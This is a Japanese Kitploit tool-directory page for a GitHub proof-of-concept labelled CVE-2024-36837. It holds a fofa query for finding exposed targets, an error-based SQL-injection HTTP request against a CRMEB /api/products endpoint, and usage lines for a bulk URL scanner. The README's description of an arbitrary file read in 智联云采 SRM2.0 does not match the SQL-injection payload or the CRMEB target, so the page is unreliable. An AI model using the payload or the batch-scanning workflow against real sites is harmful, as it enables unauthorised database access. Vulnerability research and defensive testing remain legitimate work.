Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/lhc321-source/cve-2024-36837
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

CVE-2024-36837 POC

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
CVE-2024-36837 — CVE-2024-36837 POC | Kitploit

README.md

#CVE-2024-36837

免責事項

#智联云采 SRM2.0 runtimeLog/download インターフェースには任意ファイル読み取りの脆弱性が存在し、認証されていない攻撃者はこの脆弱性を利用して、システムの重要なファイル(データベース設定ファイル、システム設定ファイルなど)、データベース設定ファイルなどを読み取ることができ、ウェブサイトが極めて不安全な状態になります。

fofa構文: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #URLの前にhttp://またはhttps://を追加してください python 11.py

#使い方 python cve.py -h

#一括検出 url.txtのURLアドレスはhttp://またはhttps://である必要があります python cve.py -f url.txt

#単一検出 URLアドレスはhttp://またはhttps://である必要があります python cve.py -u url

ツールをダウンロード